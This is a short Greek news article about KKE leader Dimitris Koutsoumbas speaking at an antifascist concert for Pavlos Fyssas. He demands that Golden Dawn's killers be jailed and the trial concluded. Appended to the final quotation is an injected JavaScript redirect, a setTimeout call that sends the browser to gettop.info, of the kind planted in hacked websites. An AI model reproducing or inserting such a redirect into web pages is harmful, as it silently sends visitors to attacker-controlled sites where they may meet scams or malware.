Κουτσούμπας: Aπαράδεκτο να κυκλοφορούν ελεύθεροι οι δολοφόνοι του Φύσσα

0
17

 

Παρών ήταν ο γγ της ΚΕ του ΚΚΕ Δημήτρης Κουτσούμπας, στην αντιφασιστική συναυλία που οργάνωσε η ΚΝΕ στη μνήμη του Παύλου Φύσσα.

Ο κ. Κουτσούμπας σχολίασε: «Τρία χρόνια μετά τη δολοφονία του Παύλου Φύσσα και τις άλλες εγκληματικές ενέργειες της ΧΑ, κατά συνδικαλιστών, κατά μεταναστών, είναι απαράδεκτο να κυκλοφορούν ελεύθεροι οι δολοφόνοι, όπως και όσοι τους καθοδήγησαν ιδεολογικά, πολιτικά, επιχειρησιακά σ’ αυτές τις δολοφονίες και τις εγκληματικές πράξεις, είναι απαράδεκτο να μην έχει ολοκληρωθεί η δίκη της ΧΑ».

Όπως τόνισε τις «τεράστιες πολιτικές ευθύνες» των κυβερνήσεων «και η σημερινή για τους 20 μήνες που κυβερνά, αλλά και η προηγούμενη για τους αντίστοιχους μήνες που κυβερνούσε, μετά από αυτά τα τραγικά επεισόδια».

«Αυτήν τη στιγμή, αυτό που θέλουμε να δώσουμε ως μήνυμα, είναι ότι εξακολουθούν να είναι επίκαιρα τα λόγια του ποιητή Φώντα Λάδη, που τα έκανε τραγούδι ο Θάνος Μικρούτσικος «τον φασισμό βαθιά κατάλαβέ τον, δεν θα πεθάνει μόνος τσάκισέ τον»», κατέληξε ο γγ του ΚΚΕ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here